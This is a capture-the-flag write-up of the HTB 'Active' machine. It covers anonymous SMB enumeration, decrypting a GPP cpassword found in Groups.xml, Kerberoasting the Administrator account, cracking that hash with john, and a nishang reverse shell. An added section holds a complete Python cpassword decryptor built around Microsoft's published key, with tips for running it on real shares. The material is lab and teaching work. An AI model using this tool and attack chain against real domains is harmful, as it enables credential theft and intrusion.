Introduction

Today I explore Active from HTB, an OSCP-like box that rewards careful SMB enumeration with smbclient and CrackMapExec (CME). I started by running an AutoRecon scan, which showed LDAP, Kerberos and SMB running, the usual signature of a domain controller.

I have mentioned AutoRecon in (every) guide, so look at my previous posts for more information.

smbclient lists a share named Replication that is readable without credentials. I use CME to verify:

Running CME shows I can read Replication with null authentication.

I log in with smbclient using the -N (--no-pass) flag and look around the directories. Eventually I find Groups.xml, which I pull to my local machine. Inside is a cpassword, which I decrypt with the help of gpp-decrypt. Group Policy Preferences encrypt cpassword with AES-256, but the key is fixed and was published by Microsoft, so anyone who can read the share can recover the cleartext; that is why MS14-025 removed the feature. For more information regarding cpasswords go HERE.

Finding Groups.xml and a password.

cpassword found inside Groups.xml.
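To show what gpp-decrypt is actually doing, here is an added example (my own code, not from the original post or from the gpp-decrypt project) that parses a Groups.xml, pulls out each cpassword and decrypts it. The AES-256 key is the one Microsoft published on MSDN and later withdrew with MS14-025; a cpassword is the UTF-16LE password, PKCS#7-padded, AES-256-CBC encrypted with an all-zero IV, then base64 encoded with the trailing '=' padding stripped. AES is implemented in pure Python so the script runs without third-party packages. The Groups.xml, the account svc_backup and the password Summer2020! are constructed sample input, and gpp_encrypt exists only to build that sample.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published on MSDN for GPP cpassword (MS14-025); identical in every domain.
GPP_KEY = bytes.fromhex("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")

def _mul(a, b):  # GF(2^8) multiplication with the AES polynomial 0x11b
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = ((a << 1) ^ 0x1B) & 0xFF if a & 0x80 else a << 1
        b >>= 1
    return r

def _make_sbox():  # multiplicative inverse followed by the affine map
    sbox = [0x63] * 256
    for a in range(1, 256):
        x = next(b for b in range(1, 256) if _mul(a, b) == 1)
        s = 0x63
        for _ in range(5):
            s ^= x
            x = ((x << 1) | (x >> 7)) & 0xFF
        sbox[a] = s
    return sbox

SBOX = _make_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]

def _expand_key(key):  # AES-256 key schedule: 32-byte key -> 15 round keys of 16 bytes
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _mul(rcon, 2)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append([x ^ y for x, y in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]

def _shift_rows(s, d):  # d=+1 ShiftRows, d=-1 InvShiftRows; state index is 4*col + row
    return [s[4 * ((col + d * row) % 4) + row] for col in range(4) for row in range(4)]

def _mix_columns(s, m):  # circulant matrix m: (2, 3, 1, 1) forward, (14, 11, 13, 9) inverse
    return [_mul(s[4 * col], m[-row % 4]) ^ _mul(s[4 * col + 1], m[(1 - row) % 4])
            ^ _mul(s[4 * col + 2], m[(2 - row) % 4]) ^ _mul(s[4 * col + 3], m[(3 - row) % 4])
            for col in range(4) for row in range(4)]

def _encrypt_block(rk, block):
    s = [b ^ k for b, k in zip(block, rk[0])]
    for r in range(1, 15):
        s = _shift_rows([SBOX[b] for b in s], 1)
        if r < 14:  # the last round has no MixColumns
            s = _mix_columns(s, (2, 3, 1, 1))
        s = [b ^ k for b, k in zip(s, rk[r])]
    return bytes(s)

def _decrypt_block(rk, block):
    s = [b ^ k for b, k in zip(block, rk[14])]
    for r in range(13, -1, -1):
        s = [INV_SBOX[b] for b in _shift_rows(s, -1)]
        s = [b ^ k for b, k in zip(s, rk[r])]
        if r > 0:
            s = _mix_columns(s, (14, 11, 13, 9))
    return bytes(s)

def aes256_cbc(key, data, encrypt, iv=b"\x00" * 16):  # GPP uses an all-zero IV
    rk, prev, out = _expand_key(key), iv, b""
    for i in range(0, len(data), 16):
        blk = data[i:i + 16]
        if encrypt:
            prev = _encrypt_block(rk, bytes(p ^ c for p, c in zip(blk, prev)))
            out += prev
        else:
            out += bytes(p ^ c for p, c in zip(_decrypt_block(rk, blk), prev))
            prev = blk
    return out

def gpp_decrypt(cpassword):
    raw = base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))  # GPP strips the '=' padding
    plain = aes256_cbc(GPP_KEY, raw, encrypt=False)
    return plain[:-plain[-1]].decode("utf-16-le")  # drop PKCS#7 padding, decode UTF-16LE

def gpp_encrypt(password):  # what the GPP editor did; used here only to build the sample
    data = password.encode("utf-16-le")
    data += bytes([16 - len(data) % 16]) * (16 - len(data) % 16)
    return base64.b64encode(aes256_cbc(GPP_KEY, data, encrypt=True)).decode().rstrip("=")

def extract_gpp_creds(xml_text):  # (userName, cpassword, cleartext) for each cpassword attribute
    return [(p.get("userName"), p.get("cpassword"), gpp_decrypt(p.get("cpassword")))
            for p in ET.fromstring(xml_text).iter("Properties") if p.get("cpassword")]

# Constructed Groups.xml in the layout GPP writes; the account and password are invented.
SAMPLE_GROUPS_XML = f"""<Groups clsid="{{3125E937-EB16-4b4c-9934-544FC6D24D26}}">
  <User clsid="{{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}}" name="svc_backup"><Properties action="U"
    cpassword="{gpp_encrypt('Summer2020!')}" changeLogon="0" noChange="1" userName="svc_backup"/></User>
</Groups>"""

if __name__ == "__main__":
    print(extract_gpp_creds(SAMPLE_GROUPS_XML))
```

Against a real Groups.xml pulled from a share, pass the file contents to extract_gpp_creds; the same key works in every domain, so a result that is not a printable string means the base64 was mangled in transit, not that the key is wrong. The same attribute also turns up in Services.xml, ScheduledTasks.xml, DataSources.xml and Drives.xml under the same Preferences folder, and the parser above handles those files unchanged because it only looks for Properties elements with a cpassword.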

Using the credentials found, I run GetUserSPNs.py (Impacket) against the domain. It lists every account that has an SPN and requests a service ticket for each; the Administrator account has one, so I get back a ticket whose encrypted part was produced with Administrator's password hash, printed as a $krb5tgs$ hash. I crack this hash offline with john.

GetUserSPNs.py grabbing the Administrator account's hash.

Using john to crack the krb5tgs hash.

Using the Administrator password, CME and Invoke-PowerShellTCP.ps1 from nishang, I get a shell on the box and root it:

Using the Admin creds alongside CME and Invoke-PowerShellTCP to launch a shell.

HTB Active proof (not clean), as the & parameter kept dropping the shell.

Rooted

Published On: October 20th, 2020 / Categories: HTB, Technology
